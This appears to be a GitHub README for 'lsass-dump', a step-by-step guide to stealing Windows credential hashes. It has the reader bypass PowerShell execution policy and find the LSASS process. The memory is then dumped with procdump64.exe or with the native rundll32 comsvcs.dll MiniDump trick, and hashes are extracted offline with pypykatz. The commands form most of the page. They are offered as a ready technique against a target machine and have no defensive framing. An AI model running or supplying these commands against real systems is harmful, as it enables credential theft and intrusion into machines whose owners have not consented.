lsass-dump

Dump Hashes From lsass

View on GitHub

Lsass-dump

Don’t need mimikatz. You can now dump hashes from LSASS by abusing LSASS process and generate a lsass.dmp file. After that we will use pypykatz to extarct the hashes from lsass.dmp file.

Exploitation

First we must have an administrative privilege to carry this attack. Upload procdump64.exe to target machine.

Execute Powershell

powershell.exe -ep bypass

Get te lassa process id

get-process lsass

OnPaste 20220609-133131

In our case 596 is the lsass process ID. Execute it with procdump64.exe and generate a file contain hashes.

Dumping Hashes into a file

.\procdump64.exe -accepteula -ma 596 lsass.dmp

ALTERNATE

We can also use native DLLs instead of procdump64.exe, this way we don’t have to upoad anything on target machine.

C:\\Windows\\System32\\rundll32.exe C:\\windows\\System32\\comsvcs.dll, MiniDump 596 C:\\Users\\Bob\\Desktop\\lsass.dmp full

OnPaste 20220609-134015

OnPaste 20220609-135307

Using Pypykatz

After downloading that lsass.dmp file to our attacking machine, now we can exctract the hashes using pypykatz.

pypykatz lsa minidump lsass.dmp

OnPaste 20220609-135650